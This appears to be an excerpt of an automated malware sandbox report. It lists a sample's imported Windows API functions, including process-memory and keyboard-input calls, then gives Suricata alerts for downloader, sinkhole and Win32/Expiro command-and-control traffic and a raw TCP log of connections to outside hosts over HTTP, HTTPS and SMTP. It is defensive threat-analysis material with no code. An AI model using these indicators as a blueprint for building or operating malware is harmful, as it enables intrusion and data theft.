MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-28T18:26:53.571947+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49701	132.226.8.169	80	TCP
2024-11-28T18:27:11.192599+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.244.188.177	80	192.168.2.7	49738	TCP
2024-11-28T18:27:11.192599+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.244.188.177	80	192.168.2.7	49738	TCP
2024-11-28T18:27:15.606360+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.141.10.107	80	192.168.2.7	49745	TCP
2024-11-28T18:27:15.606360+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.141.10.107	80	192.168.2.7	49745	TCP
2024-11-28T18:27:18.221469+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.7	49753	54.244.188.177	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2024 18:26:50.884608030 CET	49701	80	192.168.2.7	132.226.8.169
Nov 28, 2024 18:26:51.004617929 CET	80	49701	132.226.8.169	192.168.2.7
Nov 28, 2024 18:26:51.004923105 CET	49701	80	192.168.2.7	132.226.8.169
Nov 28, 2024 18:26:51.005358934 CET	49701	80	192.168.2.7	132.226.8.169
Nov 28, 2024 18:26:51.125475883 CET	80	49701	132.226.8.169	192.168.2.7
Nov 28, 2024 18:26:51.255809069 CET	49702	443	192.168.2.7	172.67.74.152
Nov 28, 2024 18:26:51.255851984 CET	443	49702	172.67.74.152	192.168.2.7
Nov 28, 2024 18:26:51.255979061 CET	49702	443	192.168.2.7	172.67.74.152
Nov 28, 2024 18:26:51.264508009 CET	49702	443	192.168.2.7	172.67.74.152
Nov 28, 2024 18:26:51.264523029 CET	443	49702	172.67.74.152	192.168.2.7
Nov 28, 2024 18:26:52.575807095 CET	443	49702	172.67.74.152	192.168.2.7
Nov 28, 2024 18:26:52.575885057 CET	49702	443	192.168.2.7	172.67.74.152
Nov 28, 2024 18:26:52.660975933 CET	49702	443	192.168.2.7	172.67.74.152
Nov 28, 2024 18:26:52.661006927 CET	443	49702	172.67.74.152	192.168.2.7
Nov 28, 2024 18:26:52.661333084 CET	443	49702	172.67.74.152	192.168.2.7
Nov 28, 2024 18:26:52.712496996 CET	49702	443	192.168.2.7	172.67.74.152
Nov 28, 2024 18:26:52.825709105 CET	49702	443	192.168.2.7	172.67.74.152
Nov 28, 2024 18:26:52.867333889 CET	443	49702	172.67.74.152	192.168.2.7
Nov 28, 2024 18:26:52.891927958 CET	80	49701	132.226.8.169	192.168.2.7
Nov 28, 2024 18:26:52.964982986 CET	49701	80	192.168.2.7	132.226.8.169
Nov 28, 2024 18:26:53.085014105 CET	80	49701	132.226.8.169	192.168.2.7
Nov 28, 2024 18:26:53.172167063 CET	443	49702	172.67.74.152	192.168.2.7
Nov 28, 2024 18:26:53.172379017 CET	443	49702	172.67.74.152	192.168.2.7
Nov 28, 2024 18:26:53.172435045 CET	49702	443	192.168.2.7	172.67.74.152
Nov 28, 2024 18:26:53.208930016 CET	49702	443	192.168.2.7	172.67.74.152
Nov 28, 2024 18:26:53.482584953 CET	80	49701	132.226.8.169	192.168.2.7
Nov 28, 2024 18:26:53.571947098 CET	49701	80	192.168.2.7	132.226.8.169
Nov 28, 2024 18:26:53.806446075 CET	49704	443	192.168.2.7	172.67.177.134
Nov 28, 2024 18:26:53.806483984 CET	443	49704	172.67.177.134	192.168.2.7
Nov 28, 2024 18:26:53.806540966 CET	49704	443	192.168.2.7	172.67.177.134
Nov 28, 2024 18:26:53.811336040 CET	49704	443	192.168.2.7	172.67.177.134
Nov 28, 2024 18:26:53.811350107 CET	443	49704	172.67.177.134	192.168.2.7
Nov 28, 2024 18:26:54.331792116 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:54.457113028 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:54.457226038 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:55.029834986 CET	443	49704	172.67.177.134	192.168.2.7
Nov 28, 2024 18:26:55.029911041 CET	49704	443	192.168.2.7	172.67.177.134
Nov 28, 2024 18:26:55.035623074 CET	49704	443	192.168.2.7	172.67.177.134
Nov 28, 2024 18:26:55.035639048 CET	443	49704	172.67.177.134	192.168.2.7
Nov 28, 2024 18:26:55.035955906 CET	443	49704	172.67.177.134	192.168.2.7
Nov 28, 2024 18:26:55.088288069 CET	49704	443	192.168.2.7	172.67.177.134
Nov 28, 2024 18:26:55.131330013 CET	443	49704	172.67.177.134	192.168.2.7
Nov 28, 2024 18:26:55.473886967 CET	443	49704	172.67.177.134	192.168.2.7
Nov 28, 2024 18:26:55.473951101 CET	443	49704	172.67.177.134	192.168.2.7
Nov 28, 2024 18:26:55.474030972 CET	49704	443	192.168.2.7	172.67.177.134
Nov 28, 2024 18:26:55.503346920 CET	49704	443	192.168.2.7	172.67.177.134
Nov 28, 2024 18:26:55.780052900 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:55.786144972 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:55.906102896 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:56.198338032 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:56.200108051 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:56.320058107 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:56.612540960 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:56.612945080 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:56.739804983 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:57.038722038 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:57.038753033 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:57.038765907 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:57.038798094 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:57.115696907 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:57.236502886 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:57.528652906 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:57.532923937 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:57.653496981 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:57.946003914 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:57.948085070 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:58.068187952 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:58.360515118 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:58.361746073 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:58.482065916 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:58.783807039 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:58.794682026 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:58.921485901 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:59.213725090 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:59.217957020 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:59.337848902 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:59.885689974 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:59.885874033 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:26:59.972393036 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:26:59.973403931 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:00.006665945 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:00.298767090 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:00.299405098 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:00.299489021 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:00.299518108 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:00.299526930 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:00.419397116 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:00.419408083 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:00.419574976 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:00.419584990 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:00.804553986 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:00.868721962 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:00.914812088 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:01.039227009 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:01.331288099 CET	587	49705	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:01.331815004 CET	49705	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:01.332914114 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:01.460246086 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:01.460328102 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:02.725837946 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:02.729738951 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:02.849827051 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:03.173630953 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:03.188604116 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:03.308767080 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:03.599958897 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:03.600322008 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:03.720237970 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:04.021337032 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:04.021394968 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:04.021406889 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:04.021440983 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:04.023711920 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:04.143610001 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:04.436520100 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:04.437552929 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:04.557913065 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:04.848028898 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:04.848987103 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:04.969063997 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:05.259495974 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:05.260428905 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:05.380419970 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:05.675600052 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:05.675806999 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:05.806632996 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:06.096525908 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:06.096877098 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:06.220088005 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:06.515014887 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:06.515198946 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:06.650299072 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:06.940576077 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:06.941785097 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:06.941855907 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:06.941884041 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:06.941915989 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:06.941961050 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:06.941992044 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:06.942028999 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:06.942053080 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:06.942075014 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:06.942095995 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:07.063954115 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:07.063997030 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:07.064007998 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:07.086756945 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:07.086780071 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:07.086790085 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:07.086915970 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:07.086925030 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:07.086934090 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:07.086944103 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:07.443717003 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:27:07.499700069 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:27:09.491130114 CET	49738	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:09.611246109 CET	80	49738	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:09.611341000 CET	49738	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:09.634145021 CET	49738	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:09.634183884 CET	49738	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:09.761152029 CET	80	49738	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:09.761185884 CET	80	49738	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:11.072211981 CET	80	49738	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:11.072349072 CET	80	49738	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:11.072381020 CET	49738	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:11.072422028 CET	49738	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:11.192599058 CET	80	49738	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:13.239527941 CET	49745	80	192.168.2.7	18.141.10.107
Nov 28, 2024 18:27:13.360052109 CET	80	49745	18.141.10.107	192.168.2.7
Nov 28, 2024 18:27:13.360140085 CET	49745	80	192.168.2.7	18.141.10.107
Nov 28, 2024 18:27:13.360536098 CET	49745	80	192.168.2.7	18.141.10.107
Nov 28, 2024 18:27:13.360536098 CET	49745	80	192.168.2.7	18.141.10.107
Nov 28, 2024 18:27:13.480570078 CET	80	49745	18.141.10.107	192.168.2.7
Nov 28, 2024 18:27:13.480585098 CET	80	49745	18.141.10.107	192.168.2.7
Nov 28, 2024 18:27:15.435822964 CET	80	49745	18.141.10.107	192.168.2.7
Nov 28, 2024 18:27:15.435951948 CET	80	49745	18.141.10.107	192.168.2.7
Nov 28, 2024 18:27:15.436063051 CET	49745	80	192.168.2.7	18.141.10.107
Nov 28, 2024 18:27:15.486243963 CET	49745	80	192.168.2.7	18.141.10.107
Nov 28, 2024 18:27:15.606359959 CET	80	49745	18.141.10.107	192.168.2.7
Nov 28, 2024 18:27:16.691497087 CET	49753	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:16.812423944 CET	80	49753	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:16.812582970 CET	49753	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:16.823854923 CET	49753	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:16.823905945 CET	49753	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:16.944139004 CET	80	49753	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:16.944500923 CET	80	49753	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:18.221394062 CET	80	49753	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:18.221414089 CET	80	49753	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:18.221468925 CET	49753	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:18.221676111 CET	49753	80	192.168.2.7	54.244.188.177
Nov 28, 2024 18:27:18.341612101 CET	80	49753	54.244.188.177	192.168.2.7
Nov 28, 2024 18:27:58.482831001 CET	80	49701	132.226.8.169	192.168.2.7
Nov 28, 2024 18:27:58.487284899 CET	49701	80	192.168.2.7	132.226.8.169
Nov 28, 2024 18:28:33.516822100 CET	49701	80	192.168.2.7	132.226.8.169
Nov 28, 2024 18:28:33.637237072 CET	80	49701	132.226.8.169	192.168.2.7
Nov 28, 2024 18:28:34.104821920 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:28:34.225092888 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:34.515522957 CET	587	49716	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:34.516227007 CET	49716	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:28:40.815917969 CET	49930	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:28:40.936093092 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:40.936170101 CET	49930	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:28:42.193536043 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:42.193768978 CET	49930	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:28:42.315572977 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:42.603873968 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:42.604062080 CET	49930	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:28:42.724736929 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:43.015196085 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:43.015750885 CET	49930	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:28:43.137026072 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:43.432439089 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:43.432493925 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:43.432507038 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:43.432689905 CET	49930	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:28:43.437640905 CET	49930	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:28:43.557663918 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:43.849992990 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:43.856869936 CET	49930	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:28:43.976964951 CET	587	49930	51.195.88.199	192.168.2.7
Nov 28, 2024 18:28:44.266943932 CET	587	49930	51.195.88.199	192.168.2.7
